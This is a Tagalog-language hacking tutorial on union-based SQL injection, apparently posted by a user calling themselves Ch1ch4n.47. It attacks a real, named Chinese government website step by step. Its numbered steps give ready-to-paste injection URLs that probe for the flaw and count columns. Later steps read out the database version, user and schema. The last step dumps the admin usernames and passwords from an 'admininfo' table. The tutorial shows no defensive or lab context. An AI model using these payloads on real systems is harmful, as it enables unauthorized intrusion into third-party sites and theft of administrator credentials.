Tagalog SQL-injection (union base) tutorial by Ch1ch4n.47

1. target: http://www.tchjbh.gov.cn/news_display.php?id=148
2. ito ang itchura niya.
3.  
4. http://i247.photobucket.com/albums/gg151/titian_47/1_zps01dc4846.jpg
5.  
6. need: FireFox Browser, hackbar add-onssa walang hackbar.. pwede ding sa chrome basta ung space ay papalitan nyo ng [ + ] or [ %20 ]example: http://www.tchjbh.gov.cn/news_display.php?id=148+union+select+1--
7.  
8. 1.vulnerability checking=para macheck natin kung vulnerable ang website kelangan natin maglagay ng appostrophe ['] sa may hulian ng numero... [ news_display.php?id=148' ]may lalabas sa website na mysql error blablabla, meaning vulnerable sya para sa injection na gagawin natin!
9.  
10. http://i247.photobucket.com/albums/gg151/titian_47/2_zpsa09eaf04.jpg?t=1403438834
11.  
12. 2. column number checking=para macheck natin kung ilang column meron sa website, kelangn natin icheck isa isa hanggang makita natin ung errorang gagamitin natin ay [ ORDER BY #--)http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 1-- no errorhttp://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 2-- no errorhttp://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 3-- no error (short cut ko na ha!! kasi ang error ay nasa 22 pa!!)http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 22-- mysql error pag dating sa 22
13.  
14. so nag error po xa sa order by 22-- meaning meron tayong 21 column.
15.  
16. 3: paghanap ng vulnerable column=dahil 22 may nakita tayong error, meron tayong 21 numbers.. gento gagawin natin para macheck lagyan natin ng [ - ] news_display.php?id=-148 sa unahan ng number at [union sellect #--]http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--may makikita po kayong number
17. 14 sa website, meaning yun po yung vulnerable number, nasa 14!!
18.  
19. http://i247.photobucket.com/albums/gg151/titian_47/3_zpsb63fede3.jpg
20.  
21. 4.sql version=sa number 14 palitan lang nating ng @@version para malaman natin ang verion ng sql parang
22. gentohttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21--may makikita po kayong [ 5.1.56-community ] yang po ang version ng sql.. version 5 sya. so para sa union base ang method na bagay dito. kasi pag version 4 blind method ang ginagamit
23.  
24. http://i247.photobucket.com/albums/gg151/titian_47/4_zps7f8d2870.jpg
25.  
26. 5.current user=palitan natin ng [user()] para malaman natin ang userhttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21--gento naman ang lalabas jan! tchjbh@127.0.0.1
27.  
28. http://i247.photobucket.com/albums/gg151/titian_47/5_zpse6b83f3f.jpg
29.  
30. 6: database namegento lang!! http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21 from information_schema.schemata--orhttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database()),15,16,17,18,19,20,21--gento makikita nyo [tchjbh] yan po yung database name
31.  
32. http://i247.photobucket.com/albums/gg151/titian_47/6_zpsf8b95db4.jpg
33.  
34. 7: paghanap ng table nameito na yung pinaka masayang part!! hahahagroup_concat(table_name)FROM information_schema.tables WHERE table_schema=database()--gento po http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21 FROM information_schema.tables WHERE table_schema=database()--makikita natin ang list ng table name!! pero ang need lang natin ay ang [admininfo] ang kukunin natin!! minsan sa table may nakalagay na admin, users, members, etc..
35.  
36. http://i247.photobucket.com/albums/gg151/titian_47/7_zpsae8042fe.jpg
37.  
38. 8: paghahanap ng column namegroup_concat(column_name)FROM information_schema.columns WHERE table_schema=database()--http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21 FROM information_schema.columns WHERE table_schema=database()--makikita po natin ung [ username at passwd ] sa column
39.  
40. http://i247.photobucket.com/albums/gg151/titian_47/8_zpsddd3ce3b.jpg
41.  
42.  last part.
43.  
44. 9. dumping admin and passwordkung mapapansin ninyo. kinuwa natin ng table name at column name. yung kinuwa natin na column at table ang gagamitin natin para d2.[0x3a] sa kasunod ng user name at passwdgroup_concat(username,0x3a,passwd,0x3a)from admininfo--http://www.tchjbh.gov.cn/news_display.php?id=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x3a,passwd,0x3a),15,16,17,18,19,20,21+FROM+admininfo--
45.  
46. http://i247.photobucket.com/albums/gg151/titian_47/9_zps78c6b2b2.jpg?t=1403440294